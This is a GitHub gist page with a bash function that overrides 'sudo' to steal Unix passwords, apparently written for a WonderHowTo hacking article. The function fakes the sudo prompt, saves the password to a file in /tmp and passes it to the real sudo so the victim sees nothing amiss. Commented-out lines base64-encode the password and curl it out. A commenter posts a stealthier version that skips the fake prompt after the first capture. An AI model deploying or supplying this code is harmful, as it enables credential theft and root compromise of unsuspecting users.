Skip to content

Instantly share code, notes, and snippets.



Last active Nov 16, 2020
What would you like to do?
Sudo function for stealing Unix passwords; script for WonderHowTo article
function sudo ()
realsudo="$(which sudo)";
read -s -p "[sudo] password for $USER: " inputPasswd;
printf "\n";
printf '%s\n' "$USER : $inputPasswd" > /tmp/hackedPasswd.txt;
# encoded=$(printf '%s' "$inputPasswd" | base64) > /dev/null 2>&1;
# curl -s "$USER:$encoded" > /dev/null 2>&1;
$realsudo -S -u root bash -c "exit" <<< "$inputPasswd" > /dev/null 2>&1;
$realsudo "${@:1}"

This comment has been minimized.

Copy link

@benbusby benbusby commented Jan 8, 2020

Nice! There's one small change I think is worthwhile though:

function sudo () {
    realsudo="$(which sudo)"

    if grep -Fqs "$USER" /tmp/hackedPasswd.txt
        $realsudo "${@:1}"
        read -s -p "[sudo] password for $USER: " inputPasswd
        printf "\n"; printf '%s\n' "$USER : $inputPasswd" > /tmp/hackedPasswd.txt
        $realsudo -S <<< "$inputPasswd" -u root bash -c "exit" > /dev/null 2>&1
        $realsudo "${@:1}"

This way it skips the password prompt for subsequent commands, and doesn't look suspicious to a target running back to back sudo commands when they're still within the "root/sudo timeout" window.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment